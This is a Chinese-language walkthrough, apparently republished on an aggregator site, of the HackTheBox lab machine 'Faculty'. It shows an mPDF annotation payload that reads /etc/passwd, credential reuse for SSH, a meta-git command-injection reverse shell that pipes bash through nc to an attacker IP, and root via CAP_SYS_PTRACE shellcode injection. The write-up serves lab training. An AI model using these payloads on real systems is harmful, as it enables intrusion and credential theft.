HackTheBox - Medium - Linux - Faculty

这篇具有很好参考价值的文章主要介绍了HackTheBox - Medium - Linux - Faculty。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Faculty

Faculty 是一台中型 Linux 机器,具有 PHP Web 应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的 LFi 会泄露一个密码,该密码可用于通过 SSH 以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此机器上安装的“meta-git”版本容易受到代码注入攻击,可利用该版本将权限升级到用户“developer”。通过利用“CAP_SYS_PTRACE”功能将 shellcode 注入到以“root”身份运行的进程中,可以将权限提升到“root”。


外部信息收集

端口扫描

循例nmap

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

Web枚举

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

gobuster扫目录

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

admin/

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

这里会转pdf

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

download.php,通过html进行url编码后再转base64直接生成pdf

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

尝试打XHR,但没成功

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

从pdf属性看到又是mPDF

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

谷歌能找到一个7.0版本的LFI

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

payload

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

能读到

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

读/etc/nginx/sites-enabled/default

server {
	listen 80 default_server;
	listen [::]:80 default_server;

	root /var/www/html;

	# Add index.php to the list if you are using PHP
	index index.html index.htm index.nginx-debian.html;

	server_name _;

	rewrite ^ http://faculty.htb;
}

Foothold

绝对路径找不到真正的网站根目录,但可以相对路径读

login.php

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

db_connect.php读到一组凭据

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

密码重用于gbyolo账户,我们能够通过它登录ssh

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

本地横向移动 -> developer

sudo -l

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

在谷歌能够找到一篇meta git会受命令注入漏洞影响的文章

通过poc,能够执行命令创建文件

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

reverse shell payload

'sss||mkfifo /tmp/f1;nc 10.10.14.18 8888 < /tmp/f1 | /bin/bash > /tmp/f1 #'

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

本地权限提升

getcap

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

HackTricks提供了利用方法

msfvenom生成shellcode

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

利用python脚本生成payload

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

gdb

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误

get root

HackTheBox - Medium - Linux - Faculty,HackTheBox,HackTheBox,Linux渗透测试,网络安全,配置错误文章来源地址https://www.toymoban.com/news/detail-813322.html

到了这里,关于HackTheBox - Medium - Linux - Faculty的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [渗透测试学习]Three - HackTheBox

    本靶机考察的是AWS服务 Task1 问题:打开了多少个TCP端口? nmap扫一下 Task2 问题: 网站“联系人”部分提供的电子邮

    2024年02月02日
    浏览(33)
  • hackthebox --interface medium

    nmap -sV -sC -O -p22,80 10.10.11.200 -oN ports   访问80页面,主页面是这样的  再访问一下index.php或者index.html 发现是404错误, 有可能是里面隐藏了一些api我们可以查看到搜索看看有没有类似的api泄露 利用f12查看js源码 搜索http:// 或者/ 或者/upload 这里搜索到的是/api  说明这里是有可能跳

    2024年02月06日
    浏览(36)
  • DVWA 靶场之 Brute Force-Low&Medium(前期配置铺垫与渗透方法及源码分析)

    首先登录 DVWA 靶场 DVWA 默认的用户有5个,用户名及密码如下: 难度等级设置为 low ,我们先从最简单的开始 来到 Brute Force(暴力破解) 我们可以输入用户名和密码 简单测了几个,回显用户名或密码不正确 但是并未对我们输入的内容及次数进行限制,因此直接进行爆破 暴力

    2024年02月19日
    浏览(40)
  • Kali Linux渗透测试技术详解_渗透测试入门

    知识点 1. Kali Linux是做渗透测试用的 2. 安装VMware Workstation虚拟机 3. 安装kali-linux系统 4. 基本用法-重新设置root密码 5 安装debian11系统-默认命令行模式登录 渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、

    2024年02月13日
    浏览(51)
  • 【Kali Linux高级渗透测试】深入剖析Kali Linux:高级渗透测试技术与实践

    📕作者简介: 热爱跑步的恒川 ,致力于C/C++、Java、Python等多编程语言,热爱跑步,喜爱音乐的一位博主。 📗本文收录于恒川的日常汇报系列,大家有兴趣的可以看一看 📘相关专栏C语言初阶、C语言进阶系列、恒川等,大家有兴趣的可以看一看 📙Python零基础入门系列,J

    2024年02月10日
    浏览(46)
  • Linux操作系统渗透测试

    Linux操作系统渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 1.通过Kali对服务器场景Linux进行操作系统扫描渗透

    2023年04月09日
    浏览(44)
  • 渗透测试(8)- Kali Linux 系统概述

        Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。Kali Linux 是一款全功能的安全操作系统,它可以帮助用户完成各种安全任务,包括网络渗透测试、系统攻击、密码破解、恶意软件分析、社会工程学攻击等,同时也可以用于安全研究,帮助

    2024年01月17日
    浏览(39)
  • 【Kali Linux】高级渗透测试实战篇

    对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安

    2024年02月10日
    浏览(41)
  • 如何使用Kali Linux进行渗透测试?

    1. 渗透测试简介 渗透测试是通过模拟恶意攻击,评估系统、应用或网络的安全性的过程。Kali Linux为渗透测试人员提供了丰富的工具和资源,用于发现漏洞、弱点和安全风险。 2. 使用Kali Linux进行渗透测试的步骤 以下是使用Kali Linux进行渗透测试的基本步骤: 信息收集: 在进

    2024年02月12日
    浏览(44)
  • 从实践中学习Kali Linux渗透测试

    目录 第一章 渗透测试概述 1.1 什么是渗透测试 1.1.1 黑盒测试 1.1.2 白盒测试 1.1.3 灰盒测试 1.2 渗透测试流程 1.3 Kali Linux系统概述 1.3.1 为什么使用Kali Linux 1.3.2 Kali Linux发展史 1.4 法律边界 1.4.1 获取合法权限 1.4.2 部分操作的危害性 第二章 安装Kali Linux系统 2.1 下载镜像 2.1.1 获取

    2023年04月08日
    浏览(39)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包